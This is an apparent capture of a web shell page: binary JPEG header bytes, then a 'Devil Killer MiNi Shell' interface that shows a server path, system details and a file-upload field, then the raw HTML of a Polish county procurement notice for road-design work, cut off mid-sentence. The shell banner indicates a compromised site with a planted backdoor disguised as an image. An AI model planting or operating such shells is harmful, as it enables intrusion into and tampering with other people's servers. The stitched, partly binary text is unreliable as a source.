JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220615/0020987101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji technicznej na zadanie:<br/>Przebudowa drogi powiatowej nr 2337G Ostaszewo – Lichnowy wraz z budową chodnika </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT MALBORSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192644731</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Słowiański 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Malbork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ii@powiat.malbork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.powiat.malbork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji technicznej na zadanie:<br/>Przebudowa drogi powiatowej nr 2337G Ostaszewo – Lichnowy wraz z budową chodnika </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6ba78bf8-ec6f-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00209871</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00010788/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.44 Wykonanie dokumentacji technicznej na zadanie: Przebudowa drogi powiatowej nr 2337G Ostaszewo – Lichnowy wraz z budową chodnika.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.powiat.malbork.pl/zamowienia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiat-malbork.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia komunikacja odbywa się przy użyciu platformy zakupowej https://powiat-malbork.ezamawiajacy.pl. <br/>2)	Oferty, oświadczenia sporządza się pod rygorem nieważności, w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym.<br/>3)	Zgodnie z art. 61. ust. 1. oraz art. 63 ust. 2 ustawy Prawo Zamówień Publicznych z dnia 11 września 2019 r. komunikacja w niniejszym postępowaniu odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej, pliki należy opatrzyć:<br/>•	kwalifikowanym podpisem elektronicznym,<br/>•	podpisem zaufanym,<br/>•	lub elektronicznym podpisem osobistym.<br/>4)	Oświadczenia podmiotów składających ofertę wspólnie oraz podmiotów udostępniających potencjał składane powinny mieć formę dokumentu elektronicznego, podpisanego kwalifikowanym podpisem elektronicznym przez każdego z nich w zakresie w jakim potwierdzają okoliczności, o których mowa w treści art. 273 ust. 1 ustawy. <br/>5)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie zakupowej https://powiat-malbork.ezamawiajacy.pl <br/>6)	W zakładce Regulacje i procedury procesu zakupowego znajduje się szczegółowa instrukcja odnoście założenia konta przez Wykonawcę (Instrukcja_OnePlace_Wykonawca). <br/>7)	Zamawiający zgodnie rozporządzeni Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452 ) zwane dalej rozporządzeniem określa dopuszczalny format kwalifikowanego podpisu elektronicznego, jako:<br/>a)	dokumenty w formacie &#34;pdf&#34; zaleca się podpisywać formatem PAdES,<br/>b)	dopuszcza się podpisanie dokumentów w formacie innym niż &#34;pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć oddzielny plik z podpisem.<br/>8)	Zamawiający zgodnie z ww. rozporządzeniem, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach: pdf., excel., doc., zip.<br/>9)	Zamawiający zgodnie z ww. rozporządzeniem określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.<br/>10)	Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Instytutu Miar.<br/>Szczegóły opisane w pkt 7 SWZ Rozdział I</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://powiat-malbork.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych (zwanym dalej „RODO” Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych <br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) informujemy, iż:<br/>Administratorem danych osobowych Wykonawcy jest:<br/>Powiat Malborski – Starostwo Powiatowe w Malborku<br/>Plac Słowiański 17<br/>Malbork<br/>/nazwa i adres oraz dane kontaktowe Zamawiającego/;<br/>Inspektorem ochrony danych osobowych<br/>w Powiecie Malborskim – Starostwie Powiatowym w Malborku jest:<br/>Paweł SZARMACH<br/>adres e-mail	iod@powiat.malbork.pl<br/>telefon 55 646 04 00<br/>/imię i nazwisko, kontakt: adres e-mail, telefon/;<br/>Dane osobowe Wykonawcy będą przetwarzane w następujących celach:<br/>a)	oceny złożonych ofert i wyboru oferty najkorzystniejszej,<br/>b)	udzielenia zamówienia i zawarcia umowy,<br/>c)	realizacji i rozliczenia zamówienia,<br/>d)	archiwizacji dokumentacji.<br/>2)	Podstawą prawną przetwarzania danych osobowych jest obowiązek prawny administratora <br/>art. 6 ust. 1 lit. c) RODO oraz zawarta umowa art. 6 ust.1 lit. b) RODO (jeżeli dotyczy). Powyższe cele wynikają z Ustawy Prawo zamówień publicznych oraz aktów wykonawczych do ustawy.<br/>3)	Dane osobowe Wykonawcy będą ujawniane osobom upoważnionym przez administratora danych osobowych oraz podmiotom upoważnionym na podstawie przepisów prawa. Ponadto w zakresie stanowiącym informację publiczną dane będą ujawniane każdemu zainteresowanemu taką informacją lub publikowane w BIP Urzędu;<br/>4)	Dane osobowe Wykonawcy będą przechowywane przez okres wynikający z przepisów prawa dotyczących archiwizacji oraz innych przepisów w szczególności w przypadku dofinansowania zamówienia ze środków Unii Europejskiej.<br/>5)	Wykonawcy przysługuje prawo dostępu do treści swoich danych oraz prawo żądania ich sprostowania, usunięcia lub ograniczenia przetwarzania, prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>6)	Podanie przez Wykonawcę danych osobowych jest wymogiem ustawowym oraz warunkiem zawarcia umowy w przypadku wyboru oferty. Podanie danych jest obowiązkowe a konsekwencją niepodania danych osobowych będzie niemożność udziału w postępowaniu o udzielenie zamówienia publicznego oraz zawarcia umowy.<br/>7)	Dane osobowe Wykonawcy nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji ani profilowania, o którym mowa w art. 22 RODO.<br/>8)	Pozostałe informacje dotyczące obowiązku informacyjnego RODO, zostały zamieszczone na stronie internetowej Zamawiającego, dostępne pod poniżej wskazanym adresem:<br/>http://bip.powiat.malbork.pl/dokumenty/1052<br/><br/><br/>Klauzula informacyjna (Informacje podawane w przypadku zbierania danych osobowych od osoby, której dane dotyczą) zawarta jest w SWZ Rozdział I pkt 23</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna (Informacje podawane w przypadku zbierania danych osobowych od osoby, której dane dotyczą) zawarta jest w SWZ Rozdział I pkt 23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NR sprawy ZZP.272.37.2022.II</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 78049,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie dokumentacji technicznej na zadanie: <br/>Przebudowa drogi powiatowej nr 2337G Ostaszewo – Lichnowy wraz z budową chodnika.<br/><br/>Przedmiot zamówienia<br/>1.	Dokumentacja projektowa winna być wykonana na mapach do celów projektowych.<br/>2.	Długości i zakresy podanych odcinka jest orientacyjny i może ulec zmianie w trakcie wykonywania dokumentacji projektowej.<br/>3.	Zakres opracowania:<br/>a)	Mapa do celów projektowych – w wersji papierowej 1 egz.<br/>b)	Projekt budowlany	4 egz.<br/>•	uzgodnienia i decyzje, niezbędne do wykonania dokumentacji<br/>•	niezbędne opracowania, analizy i ekspertyz,<br/>c)	Specyfikacja techniczna wykonania i odbioru robót4 egz.<br/>d)	Przedmiar4 egz.<br/>e)	Kosztorys inwestorski4 egz.<br/>f)	Kosztorys ofertowy („ślepy”)4 egz.<br/>g)	Projekt czasowej organizacji ruchu	4 egz.<br/>h)	Zatwierdzony projekt stałej organizacji ruchu	4 egz.<br/>i)	Wersja elektroniczna na płycie CD 2 egz.<br/>Wersja elektroniczna w swojej zawartości musi odpowiadać wersji papierowej pod względem zawartości (treści) jak i kolejności ułożenia dokumentów oraz rysunków.<br/>4.	Przedmiot zamówienia swym zakresem rzeczowym i merytorycznym ma współgrać z posiadaną przez Zamawiającego dokumentacją projektową pod nazwą: „Przebudowa drogi powiatowej nr 2337G Ostaszewo – Lichnowy” wykonaną w 2021r. Zostanie ona udostępniona jako Załącznik nr 6 do Rozdziału II SWZ.<br/>5.	Wszelkiego rodzaju decyzje uzgodnienia, pozwolenia, opinie itp. dokumenty winny dotyczyć obu dokumentacji projektowych tj.:<br/>Odcinek 1 ok. od km 0+000 do km 2+000 - przedmiot zamówienia.<br/>Odcinek 2 ok. od km 2+000 do km 3+100 - posiadana przez Zamawiającego dokumentacja projektowa.<br/>6.	Przedmiot zamówienia obejmuje ponadto:<br/>a)	uzgodnienie koncepcji projektu z Zamawiającym,<br/>b)	przeniesienie na Zamawiającego praw autorskich majątkowych w zakresie dokumentacji projektowej, w tym praw autorskich zależnych, <br/>c)	udział w postępowaniu przetargowym na wyłonienie Wykonawcy robót (odpowiedzi na pytania, składanie wyjaśnień itp.).<br/>Wykonawca udzieli odpowiedzi na pytania oraz złoży stosowne wyjaśnienia wynikające z postępowania przetargowego na wyłonienie Wykonawcy robót budowlanych, które dotyczyć będą dokumentacji projektowej po otrzymaniu pisemnego wezwanie Zamawiającego w terminie 3 dni roboczych,<br/>d)	prowadzenie nadzoru autorskiego w trakcie realizacji robót budowlanych w zakresie uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego - na wezwanie Zamawiającego w terminie 3 dni roboczych.<br/>e)	jednorazowego, bezpłatnego uaktualnienia kosztorysu inwestorskiego na pisemne wezwanie Zamawiającego w terminie do 14 dni od daty wezwania.<br/>2.	W ramach niniejszego przedmiotu zamówienia do Wykonawcy należy:<br/>a)	wystąpienie w imieniu Zamawiającego w celu uzyskania warunków, uzgodnień, decyzji itp. niezbędnych do wykonania robót budowlanych (warunki wydane przez gestorów sieci muszą uzyskać akceptację Zamawiającego),<br/>b)	wystąpienie w imieniu Zamawiającego do właściwego organu administracji – Wydziału Architektury i Budownictwa w celu uzyskania decyzji administracyjnej, która jest niezbędna do rozpoczęcia i prowadzenia budowy lub wykonywania robót budowlanych.<br/>c)	wykonanie wszelkich niezbędnych opracowań, których konieczność wyniknie w toku prac projektowych, w tym wykonanie wszelkich niezbędnych analiz i ekspertyz,<br/>d)	przedłożenie Zamawiającemu wraz z oddaniem przedmiotu zamówienia wykazu opracowań oraz pisemne oświadczenie, że wykonana dokumentacja projektowa jest zgodna z umową, obowiązującymi przepisami i normami oraz została wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć<br/><br/><br/>Zakres rzeczowy dokumentacji projektowej<br/>1.wykonanie nowej nawierzchni bitumicznej na jezdni z mieszanki SMA 16 na długości ok. 2,00km poza terenem zabudowanym, ok. 0,80km w terenie zabudowanym,<br/>2.wykonanie nowego chodnika przez cała miejscowość Pordenowo o nawierzchni z kostki polbruk o długości około 0,80km,<br/>3.wyrównanie istniejącej konstrukcji drogi mieszanką mineralno – bitumiczną AC16W, <br/>4.wykonanie poszerzeń drogi do szerokości normatywnej 6m,<br/>5.odmulenie, oczyszczenie i wyprofilowanie istniejących rowów,<br/>6.oczyszczenie istniejących przepustów pod koroną drogi oraz zjazdami wraz z remontem przyczółków,<br/>7.	wykonanie uzupełnienia do nowej niwelety kruszywem łamanym 0/31,5 w obrębie istniejących zjazdów i mieszanką bitumiczną SMA16,<br/>8.wykonanie poboczy z mieszanki optymalnej,<br/>9.pielęgnacja zadrzewienia poprzez: przycięcie konarów do skrajni drogi, frezowanie karpin i usunięcie odrostów drzew,<br/>10.wykonanie kanału technologicznego,<br/>11.wykonanie oznakowania pionowego i poziomego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami i wagami:<br/><br/>kryterium obowiązujące:<br/>•	cena	waga: 60 pkt<br/>kryterium przedmiotowe:<br/>•	doświadczenie osób realizujących zamówienie	waga: 40 pkt<br/><br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawione wyżej kryteria oraz ich wagi. Oferty oceniane będą punktowo. Maksymalną ilość punktów, jaką po uwzględnieniu wag, może osiągnąć oferta, wynosi 100 pkt, tj.:<br/>•	za najkorzystniejszą cenę 60 pkt<br/>•	za największe doświadczenie osób realizujących zamówienie	40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt - doświadczenie osób realizujących zamówienie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Potwierdzenie spełnienia przez wykonawcę warunku udziału w postępowaniu dotyczącego zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie opisuje tego warunku.<br/>2)	Potwierdzenie spełnienia przez wykonawcę warunku udziału w postępowaniu dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Zamawiający nie opisuje tego warunku.<br/>3)	Potwierdzenie spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie opisuje tego warunku.<br/>4)	Potwierdzenie spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej. <br/>Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a)	Wykonawca musi przedstawić wykaz usług tj. wykonanych dokumentacji projektowych, których przedmiotem były roboty budowlane. Wykonawca spełni warunek jeżeli wykaże, że projektował w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługa związana z wykonaniem dokumentacji projektowych została wykonana, oraz z załączeniem dowodów określających czy ta usługa została wykonana należycie, w szczególności informacji o tym czy zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługa była wykonywana, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Wykonawcy winni udokumentować TYLKO realizację usługi w zakresie: wykonywania dokumentacji projektowej w ramach:<br/>•	budowy/przebudowy/remontu drogi o nawierzchni bitumicznej o długości minimalnej nie mniej niż 1,5km<br/>•	budowy/przebudowy/remontu drogi w zakresie budowy chodnika o długości minimalnej nie mniej niż 0,5km.<br/>b)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wymaga się, dysponowania:<br/>•	minimum jedną osobą na stanowisku projektanta,<br/>•	posiadającą uprawnienia budowlane do projektowania robót budowlanych w specjalności drogowej bez ograniczeń lub odpowiadające im 